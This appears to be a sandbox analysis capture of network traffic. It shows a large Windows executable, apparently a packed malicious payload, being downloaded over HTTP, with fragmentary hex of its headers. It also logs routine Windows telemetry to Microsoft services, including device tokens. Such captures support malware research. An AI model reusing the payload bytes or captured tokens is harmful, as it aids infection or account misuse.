Nov 26, 2024 00:27:10.839961052 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 25 Nov 2024 23:27:10 GMT Content-Type: application/octet-stream Content-Length: 4375040 Last-Modified: Mon, 25 Nov 2024 21:29:06 GMT Connection: keep-alive ETag: "6744ec22-42c200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 40 c4 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 70 c4 00 00 04 00 00 da f8 42 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 2f c4 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 2f c4 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL<g(Is2@J@pB@ _qsh// px'@.rsrc p'@.idata q'@ 8q'@jgrcqeum '@ulgvfaad0B@.taggant0@"B@
Nov 26, 2024 00:27:10.840003014 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2024 00:27:10.840061903 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2024 00:27:10.840111017 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2024 00:27:10.840166092 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2024 00:27:10.840203047 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: {DACvwpSAdJ`6
Nov 26, 2024 00:27:10.840236902 CET	448	IN	Data Raw: d7 57 73 dd 8d 2a b5 ce d3 d6 5b 1a cd 5e 7d 8a 1a 5c 9b 9e db 86 75 39 ce 9a c5 f7 23 8f c1 6f c7 9b ea f2 85 67 79 4a d1 14 0a 67 79 99 6e c9 76 35 a9 55 5a 5a be 80 e8 8b 01 d2 a1 1e ce 31 a6 8e 93 83 d9 94 c2 61 44 5f d2 5b cb 3c f7 db 73 d4 Data Ascii: Ws*[^}\u9#ogyJgynv5UZZ1aD_[<sNKpm`k>ksK6.>+o:MdBLjl`0gm:$6Jr5_,'J, +su,#y,vQ!LzhG[)dv_(\/.SC,"W-N
Nov 26, 2024 00:27:10.840274096 CET	1236	IN	Data Raw: e3 6d fd 0d 74 5c bb 89 9f 15 94 13 53 5d 90 a6 f0 de 25 0f 5f b1 23 ea 6f 5a c9 62 6f ad b5 8d 2d da c6 25 34 af 57 f8 2c aa 61 4f 8a a3 c7 69 01 33 c3 46 54 0e 0b bf d3 fb d5 ae af 2a 77 73 96 d4 a6 5b 89 9d 2d 57 08 b3 e5 97 c3 7d 43 ba 17 be Data Ascii: mt\S]%_#oZbo-%4W,aOi3FTws[-W}CRXe+OXi+f.&U\|LTWyq`mgT?kM;zN&mxnjN,<V1JG#Q_AkoKzW v'N-Ldw&Y
Nov 26, 2024 00:27:10.840323925 CET	1236	IN	Data Raw: 0d 2a d1 05 39 cf 45 04 f3 be 5c fa 2f 39 8c e6 e2 4e 8b 0f 74 6a 17 1b ed 21 c8 59 eb 43 80 e6 2f 65 fa 45 f5 13 16 d6 1a a6 b8 89 13 ba 82 11 d8 bc c1 d7 ba 2b e8 1d 16 ba c9 6a 30 4b e0 fd 04 96 0e e4 35 03 cc ca 2f ea e0 21 d0 65 15 2b d9 b8 Data Ascii: *9E\/9Ntj!YC/eE+j0K5/!e+ng<cWZt.vEr%c~QMdVw@5/4<%/o/54(1w_vJ-JWcB~_ IourwL!(l%oI\|?&:
Nov 26, 2024 00:27:10.840358019 CET	1236	IN	Data Raw: 0a ee 60 bc 20 61 40 6e d3 9b 6d 7b 2e 9f cf 05 df 68 fa ae cf b4 fb 1c f7 6f cc 07 89 aa 19 6c de 83 e8 df d5 01 33 c6 f1 1c 04 4b 3c 75 fb 59 b4 08 f8 21 ab 6b 39 5a 13 0e a3 43 be fa cc c9 b2 4e f1 44 ac c8 63 2c ae 82 e0 9d 60 f4 3f af 4a 04 Data Ascii: ` a@nm{.hol3K<uY!k9ZCNDc,`?JLN3E +sE@jq^.895_2PF)GR,:(>+RyEP&U"YD2:iD5NFgqHNaJHmK.V&j~
Nov 26, 2024 00:27:10.962166071 CET	1236	IN	Data Raw: d6 8e 41 49 fe 59 c0 ff 3e 0c 89 55 4e f6 dd fa 42 ab 75 44 1b aa 21 cf 64 a3 5a 95 0b 7c 79 17 6a c3 44 10 9c 36 a4 04 34 b2 d3 af f5 43 ed d3 ea c1 90 00 6d 0a ce 1f aa 82 a2 7d d6 b4 68 3f 03 92 b8 cf e9 e5 24 4c 51 b5 74 a5 bb 04 b0 f8 9d 79 Data Ascii: AIY>UNBuD!dZ\|yjD64Cm}h?$LQty4Nur9/(UKg5>isJ!f)UGj>C6YHu&(q,Xa 9,J!U6VKUo]grZ,hia4vAD]sAU.>wJ "%

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49708	20.190.177.146	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:06 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4831 Host: login.live.com
2024-11-25 23:25:06 UTC	4831	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-25 23:25:06 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 25 Nov 2024 23:24:06 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C558_BL2 x-ms-request-id: af9371f5-fee1-4b67-8665-f5a2f3c31187 PPServer: PPV: 30 H: BL02EPF00027B68 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 25 Nov 2024 23:25:06 GMT Connection: close Content-Length: 11177
2024-11-25 23:25:06 UTC	11177	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49709	20.223.35.26	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:07 UTC	2586	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20231005T064721Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=200115838ec0401d93f5c0cda96a48d3&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=29&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=29&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasR [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AATSg30lpHSLRv3aehdfAT8MZ688RmsQ4gUQaoZY2q3wD+8jNNygi1INCSyrrISFjo0VIDO5y5zrRh+zFyDleJLPRlGus5HVcMFEFybgivCjz4sj3l6K8z4MXQhehwDINxnGvo+60pbz1rQxBm4DlnmNnMZPdB9qjmNOuSAWmSMiU9OHgC9vRlo2RD3ulOiwmCsuGeI+d3Pc6nG3/QFBs6V0mK02lilXc54RzeYH9M9jqTFBLh3THUS5dlekrEAHzhUeZVO3Nc9p/kkT1rtgt02dSGWlaRkoatMA716aQKzPfOqScJUMDt8rGusiHEWj8c3D+VbosbJlrb7bP9XsEu6kQZgAAECMz9jTaRCQKmSzReJAGA4awAf40G6zqiiANgfGbIIOHqWCqI/t0Bhy0l7+B7ziWHgc7OLbI3jzqcqxh1mEadELkirHi0zONAYSz3po8n0Mr+X8lsxuS32eCFWdZ7wRUBXOuQTtUudT2BbDoFqqULuV/YnjIyxZ911SoqSOjKJZl2TIxHUasKI2esajm0tcmAoF+uqhM8sl7+fzm0tm08rWRGoxiZT4KW6TafJyomU+CjFkaMrSoBUdZbZiQ1Ll2RESdooaCspbgLB1gXz0y3+NzDS8f7fgCgfMgOjoOaOjS/U0T7gh+CSJFb2dSbq7KrMgt/FCFtMItdtFlZfHUiNUVF1pnXpfQm/BRD70+xwQ5yZtldx65eP2kgnCA8hTEx6j4f0F3v9WwRBuBXVcSQhgoa62Y6MbTPoW0l/d/zLrtS/UuPcYLZufDZpnzb7ASRZU9rZY8cZsDdK3mWqDyc3KrQVbDFMY0/LUTdYSgKi6RAHPl/tSEqerEe83qdTmwPyaxODdSbn7C6J3n1WxgiBaB9itSSvjeXBgBkYVfYRoaxDbmeYEOmFDm+SS3nYes4xGZitjUhNxBrbLbcqok4pasitcB&p= Cache-Control: no-cache MS-CV: ObD2W+bkhEWq3SjB.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-25 23:25:07 UTC	814	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 1440 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: JOjBC5WuWLDcIzksGEV/I9Bph4Lqh5ad1f4QwdNn9ahZhUyW8Ux7Ri2eh4Uk1sXdl6BXVXTRzvZFcU3f3tRLIHXRHYQXcufzj6lZNNpJ5zU24XLR4g3jyT9+A9KcwKKG9sGfkJ8WpTOkKgvF8BhFm8Ufi614iBSwyKYswUO/aRkBtgOsz8rlfuI93lgmxQXKdh68WMk84zmwgo17N8GI2FUsVrXvojAVDa0ULU1pYrxtTaHQq0JeG0V1v4g++718Ox18MIMWwsW5FDY5x8Kk2L4Olq1HQ4Fyk43HPex6ca9q3eEekdq0xGCYZL3Rkf1uzl9cUi9Xvyoid3WyG35QSQ== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Mon, 25 Nov 2024 23:25:06 GMT Connection: close
2024-11-25 23:25:07 UTC	1440	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 45 6d 70 74 79 43 72 65 61 74 69 76 65 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 7d 2c 5c 22 70 72 6f 70 65 72 74 69 65 73 5c 22 3a 7b 7d 2c 5c 22 74 72 61 63 6b 69 6e 67 5c Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"EmptyCreative\",\"propertyManifest\":{},\"properties\":{},\"tracking\

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.6	49710	20.223.35.26	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:07 UTC	2579	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20231005T064721Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=70372c190de2461b9aff2bd68fb3764c&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=29&metered=false&nettype=ethernet&npid=sc-338389&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=29&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&sv [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AATSg30lpHSLRv3aehdfAT8MZ688RmsQ4gUQaoZY2q3wD+8jNNygi1INCSyrrISFjo0VIDO5y5zrRh+zFyDleJLPRlGus5HVcMFEFybgivCjz4sj3l6K8z4MXQhehwDINxnGvo+60pbz1rQxBm4DlnmNnMZPdB9qjmNOuSAWmSMiU9OHgC9vRlo2RD3ulOiwmCsuGeI+d3Pc6nG3/QFBs6V0mK02lilXc54RzeYH9M9jqTFBLh3THUS5dlekrEAHzhUeZVO3Nc9p/kkT1rtgt02dSGWlaRkoatMA716aQKzPfOqScJUMDt8rGusiHEWj8c3D+VbosbJlrb7bP9XsEu6kQZgAAECMz9jTaRCQKmSzReJAGA4awAf40G6zqiiANgfGbIIOHqWCqI/t0Bhy0l7+B7ziWHgc7OLbI3jzqcqxh1mEadELkirHi0zONAYSz3po8n0Mr+X8lsxuS32eCFWdZ7wRUBXOuQTtUudT2BbDoFqqULuV/YnjIyxZ911SoqSOjKJZl2TIxHUasKI2esajm0tcmAoF+uqhM8sl7+fzm0tm08rWRGoxiZT4KW6TafJyomU+CjFkaMrSoBUdZbZiQ1Ll2RESdooaCspbgLB1gXz0y3+NzDS8f7fgCgfMgOjoOaOjS/U0T7gh+CSJFb2dSbq7KrMgt/FCFtMItdtFlZfHUiNUVF1pnXpfQm/BRD70+xwQ5yZtldx65eP2kgnCA8hTEx6j4f0F3v9WwRBuBXVcSQhgoa62Y6MbTPoW0l/d/zLrtS/UuPcYLZufDZpnzb7ASRZU9rZY8cZsDdK3mWqDyc3KrQVbDFMY0/LUTdYSgKi6RAHPl/tSEqerEe83qdTmwPyaxODdSbn7C6J3n1WxgiBaB9itSSvjeXBgBkYVfYRoaxDbmeYEOmFDm+SS3nYes4xGZitjUhNxBrbLbcqok4pasitcB&p= Cache-Control: no-cache MS-CV: ObD2W+bkhEWq3SjB.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-25 23:25:07 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 3352 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P426081542-T1-C128000000001615609+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: atj6cRDpPUXnfPxR17jzJAKfScJTgNIRgK1w1t/x+oitkkAgjToIBWNDIq3jARkt1+YGCYm3GtnUDlsTz0ERRyPNoOpqfsuCdTjWYU5OG5Pn/o1NoFR1ffuM5R/P7rLTzqbQX4f8Wv8ACHWbHqkdHNZPnPmhl3Zrvkom7LRKkj43N3AJFCxzojfD+C6BZ+9zAMA9wm07j568P7sBJGRJ5wPlN5ldU9Z7dr781+NDwgZ6OUnMGVJvMtgvifBvuMGokVkXoUqop0ABGSdR8MPHnEbmO5xf4IG6npNbxOL2qJYLp6shaNipN11/PIEP6I4xnzIeRhUkxoDpHV4nzgDFWQ== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Mon, 25 Nov 2024 23:25:06 GMT Connection: close
2024-11-25 23:25:07 UTC	3352	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.6	49711	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:08 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 36 73 4c 6d 62 46 61 55 53 55 6d 7a 48 35 2f 35 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 62 36 36 31 32 33 36 31 32 36 37 32 61 37 37 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 6sLmbFaUSUmzH5/5.1Context: 9b66123612672a77
2024-11-25 23:25:08 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-25 23:25:08 UTC	1076	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 36 73 4c 6d 62 46 61 55 53 55 6d 7a 48 35 2f 35 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 62 36 36 31 32 33 36 31 32 36 37 32 61 37 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 7a 55 45 6b 33 4e 66 59 68 39 44 37 4a 45 5a 56 62 6c 51 70 7a 62 55 68 49 35 31 6e 4c 71 31 6c 79 78 73 49 65 70 6c 50 58 6f 72 4f 79 52 49 56 48 6e 75 53 2b 51 69 6e 32 63 6a 51 38 47 78 6c 52 66 65 2f 66 72 53 38 6e 4e 35 33 45 6b 50 56 49 67 5a 54 76 4c 63 7a 43 74 4b 2f 74 4b 78 6b 4e 6c 45 66 39 33 48 61 4b 43 39 4b Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: 6sLmbFaUSUmzH5/5.2Context: 